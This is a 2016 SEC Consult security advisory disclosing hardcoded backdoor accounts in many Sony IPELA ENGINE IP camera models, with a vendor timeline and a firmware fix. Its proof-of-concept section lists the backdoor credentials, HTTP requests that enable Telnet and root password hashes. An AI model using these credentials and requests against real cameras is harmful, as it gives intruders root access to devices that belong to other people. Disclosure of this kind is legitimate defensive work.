Backdoor vulnerability in Sony IPELA ENGINE IP cameras

We have published an accompanying blog post to this technical advisory with

further information:

blog.sec-consult.com/2016/12/backdoor-in-sony-ipela-engine-ip-cameras.html

SEC Consult Vulnerability Lab Security Advisory < 20161206-0 >

=======================================================================

title: Backdoor vulnerability

product: Sony IPELA ENGINE IP Cameras

(multiple products, see Vulnerable / tested versions below)

vulnerable version: see Vulnerable / tested versions below

fixed version: see Vulnerable / tested versions below

CVE number: -

impact: Critical

homepage: pro.sony.com/bbsc/ssr/mkt-security/

found: 2016-10-08

by: Stefan Viehböck (Office Vienna)

SEC Consult Vulnerability Lab

An integrated part of SEC Consult

Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow

Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

www.sec-consult.com

=======================================================================

Vendor description:

-------------------

"Sony Professional Solutions (SPS) is a subsidiary of Japanese multinational

technology and media conglomerate Sony with main focus on professional

products. These range from broadcast software and video cameras to providing

Outside Broadcast Units and professional displays."

Source: en.wikipedia.org/wiki/Sony_Professional_Solutions

 

Business recommendation:

------------------------

Attackers are able to completely takeover the Sony IPELA ENGINE IP Camera

products over the network.

 

Sony has provided updated firmware which should be installed immediately.

SEC Consult recommends Sony and Sony customers to conduct a thorough

security review of the affected products.

 

It is essential to restrict access to IP cameras using VLANs, firewalls

etc. Otherwise the risk of being a botnet victim (e.g. Mirai) is high.

 

Vulnerability overview/description:

-----------------------------------

Sony IPELA ENGINE IP Cameras contain multiple backdoors that, among other

functionality, allow an attacker to enable the Telnet/SSH service for

remote administration over the network.

Other available functionality may have undesired effects to the camera

image quality or other camera functionality.

 

After enabling Telnet/SSH, another backdoor allows an attacker to gain

access to a Linux shell with root privileges!

 

The vulnerabilities are exploitable in the default configuration over the

network. Exploitation over the Internet is possible, if the web interface

of the device is exposed.

 

Proof of concept:

-----------------

The following application-level backdoor accounts exist:

- User debug, Passwort: popeyeConnection

- User primana, Passwort: primana

 

These accounts are allowed to access specific, undocumented CGI functionality!

Enabling Telnet:

Execute the following HTTP requests. Afterwards the Telnet service is running

(TCP port 23). The following command is for Gen5 products, verified on SNC-DH160:

 

http:// primana:primana@HOST/command/prima-factory.cgi?foo=bar&Telnet=zKw2hEr9

http:// primana:primana@HOST/command/prima-factory.cgi?foo=bar&Telnet=cPoq2fi4cFk

 

Note: This request may look a bit different for Gen6 cameras, the string

"himitunokagi" (Japanese, translated: "secret key") is involved in the HTTP request

processing. On Gen6 cameras, a SSH daemon exists and can be enabled as well.

Furthermore an OS-level backdoor exists. This backdoor allows an attacker to

login via Telnet/SSH and access the Linux shell with root privileges!

 

Below are the password hashes for the OS-level backdoor user:

root:$1$$mhF8LHkOmSgbD88/WrM790:0:0:5thgen:/root:/bin/sh (Gen5 cameras)

root:iMaxAEXStYyd6:0:0:root:/root:/bin/sh (Gen6 cameras)

Note: The backdoor accounts likely allow an attacker with physical access to

the hardware to login via the serial port as well.

 

Vulnerable / tested versions:

-----------------------------

This vulnerability was verified on a SNC-DH160 camera with firmware

version V1.82.01 (snc-ch-dh-e-series-eb-em-zb-zm-1-82-01.zip).

The same vulnerabilities were found in firmware for Gen6 cameras

V2.7.0 (snc-g6-series-v2-7-0.zip) during automated firmware analysis with

SEC Technologies IoT Inspector.

 

According to Sony, at least the following products are affected:

 

SNC-CH115, SNC-CH120, SNC-CH160, SNC-CH220, SNC-CH260, SNC-DH120,

SNC-DH120T, SNC-DH160, SNC-DH220, SNC-DH220T, SNC-DH260, SNC-EB520,

SNC-EM520, SNC-EM521, SNC-ZB550, SNC-ZM550, SNC-ZM551

SNC-EP550, SNC-EP580, SNC-ER550, SNC-ER550C, SNC-ER580, SNC-ER585,

SNC-ER585H, SNC-ZP550, SNC-ZR550

SNC-EP520, SNC-EP521, SNC-ER520, SNC-ER521, SNC-ER521C

SNC-CX600, SNC-CX600W, SNC-EB600, SNC-EB600B, SNC-EB602R, SNC-EB630,

SNC-EB630B, SNC-EB632R, SNC-EM600, SNC-EM601, SNC-EM602R, SNC-EM602RC,

SNC-EM630, SNC-EM631, SNC-EM632R, SNC-EM632RC, SNC-VB600, SNC-VB600B,

SNC-VB600B5, SNC-VB630, SNC-VB6305, SNC-VB6307, SNC-VB632D, SNC-VB635,

SNC-VM600, SNC-VM600B, SNC-VM600B5, SNC-VM601, SNC-VM601B, SNC-VM602R,

SNC-VM630, SNC-VM6305, SNC-VM6307, SNC-VM631, SNC-VM632R, SNC-WR600,

SNC-WR602, SNC-WR602C, SNC-WR630, SNC-WR632, SNC-WR632C, SNC-XM631,

SNC-XM632, SNC-XM636, SNC-XM637, SNC-VB600L, SNC-VM600L, SNC-XM631L,

SNC-WR602CL

 

 

Vendor contact timeline:

------------------------

2016-10-11: Contacting vendor through Sony Prime Support,

asking for product security contact.

2016-10-11: Response from Product Manager - Video Security.

2016-10-14: Vendor sets up secure document exchange.

2016-10-14: Uploading security advisory.

2016-10-14: Vendor confirms receipt of security advisory.

2016-10-24: Asking for update.

2016-11-08: Asking for update again.

2016-11-08: Vendor: advisory information has been sent to HQ Japan,

they are already working on it.

2016-11-28: Sony releases updated firmware and informs SEC Consult.

2016-11-30: Asking Sony additional questions regarding the vulnerability

(no answer).

2016-11-30: Informing CERT-Bund and CERT.at.

2016-12-01: CERT-Bund informs FIRST (Forum of Incident Response and

Security Teams).

2016-12-06: Public release of security advisory.

 

Solution:

---------

The vendor provided the following URL to download firmware updates for the

affected devices. Updates should be installed immediately:

www.sony.co.uk/pro/article/sony-new-firmware-for-network-cameras

The Sony "SNC Tool Box" can be used to confirm the current firmware version and

update the device:

pro.sony.com/bbsc/ssr/mkt-security/resource.downloads.bbsccms-assets-cat-camsec-downloads-SecurityDownloadsIPCameraTools.shtml

 

Workaround:

-----------

None available.

 

Advisory URL:

-------------

www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult

Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow

Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

About SEC Consult Vulnerability Lab

The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It

ensures the continued knowledge gain of SEC Consult in the field of network

and application security to stay ahead of the attacker. The SEC Consult

Vulnerability Lab supports high-quality penetration testing and the evaluation

of new offensive and defensive technologies for our customers. Hence our

customers obtain the most current information about vulnerabilities and valid

recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Interested to work with the experts of SEC Consult?

Send us your application www.sec-consult.com/career/

 

Interested in improving your cyber security with the experts of SEC Consult?

Contact our local offices www.sec-consult.com/contact/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com

Web: www.sec-consult.com

Blog: blog.sec-consult.com

Twitter: twitter.com/sec_consult

EOF Stefan Viehböck / @2016